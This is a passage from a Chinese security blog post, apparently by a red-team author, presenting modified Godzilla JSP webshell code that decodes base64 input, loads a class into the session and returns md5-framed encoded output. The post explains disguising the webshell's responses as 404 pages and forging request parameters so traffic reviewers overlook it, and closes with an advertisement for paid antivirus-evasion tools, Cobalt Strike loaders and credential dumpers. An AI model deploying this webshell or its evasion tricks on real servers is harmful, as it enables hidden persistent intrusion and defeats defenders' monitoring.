        // 创建一个新的 "payload" 类实例并执行一些操作
        Object f = ((Class) session.getAttribute("payload")).newInstance();

        // 这两行代码的作用可能是执行某些方法(实际上似乎在执行一些无效的操作)
        f.equals(arrOut);  // 这里可能有逻辑错误,equals 方法不应该在这里使用
        f.equals(pageContext);  // 这里也类似,pageContext 似乎并不相关

        // 使用 md5 对数据进行处理,并分段输出
        response.getWriter().write(md5.substring(0, 16));

        // 将 ByteArrayOutputStream 的内容进行 Base64 编码后写入响应
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));

        // 输出 md5 后半部分
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {
    // 处理异常
    e.printStackTrace();  // 输出异常的堆栈信息
}
1
我感觉不如伪造一个 404 页面来得实在
只需要在木马中多加
try {
    // 解码传入的 base64 字符串
    byte[] data = base64Decode(request.getParameter(pass));

    data = x(data, false);

    // 如果 session 中没有 "payload" 属性,则初始化它
    if (session.getAttribute("payload") == null) {
        session.setAttribute("payload", new X(this.getClass().getClassLoader()).Q(data));
    } else {
        // 如果 "payload" 已存在,则将数据存入请求参数
        request.setAttribute("parameters", data);

        // 创建一个 ByteArrayOutputStream 对象
        java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();

        // 创建一个新的 "payload" 类实例并执行一些操作
        Object f = ((Class) session.getAttribute("payload")).newInstance();

        // 这两行代码的作用可能是执行某些方法(实际上似乎在执行一些无效的操作)
        f.equals(arrOut);  // 这里可能有逻辑错误,equals 方法不应该在这里使用
        f.equals(pageContext);  // 这里也类似,pageContext 似乎并不相关

        // 使用 md5 对数据进行处理,并分段输出
        response.getWriter().write(md5.substring(0, 16));

        // 将 ByteArrayOutputStream 的内容进行 Base64 编码后写入响应
        response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));

        // 输出 md5 后半部分
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {
    // 处理异常
    e.printStackTrace();  // 输出异常的堆栈信息
}
2
我们看看效果
访问这个木马
然后看看执行命令的回显
可以看到直接是 404
这样还是比较容易隐蔽的,一般我看流量都会过滤 404 的包

请求包特征

我们随便看一个请求包都是
参数=编码
所以这里我们还可以伪造一下请求包
我们可以直接在基础中修改
然后我们再次看到请求包
可以看到已经变了
参考https://github.com/kong030813/Z-Godzilla_ekp

圈子介绍

博主介绍

目前工作在某安全公司攻防实验室,一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练,擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。

目前已经更新的免杀内容:

  • 一键击溃360+核晶

  • 一键击溃windows defender

  • 一键击溃火绒进程

  •  CobaltStrike4.9.1二开 

  • CobaltStrike免杀加载器

  • 数据库直连工具免杀版

  • aspx文件自动上线cobaltbrike

  • jsp文件自动上线cobaltbrike

  • 哥斯拉免杀工具 XlByPassGodzilla

  • 冰蝎免杀工具 XlByPassBehinder

  • 冰蝎星落专版 xlbehinder

  • 正向代理工具 xleoreg

  • 反向代理工具xlfrc

  • 内网扫描工具 xlscan

  • CS免杀加载器 xlbpcs

  • Todesk/向日葵密码读取工具

  • 导出lsass内存工具 xlrls

  • 绕过WAF免杀工具 ByPassWAF

  • 等等...

目前星球已满200人,价格由208元调整为218元(交个朋友啦),300名以后涨价至248元!
关注微信公众号后台回复“入群”,即可进入星落安全交流群!

往期推荐

1.

3

4

5. 

声明】本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统以及盈利等目的,一切后果由操作者自行承担!!!


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
https://ZhouSa.com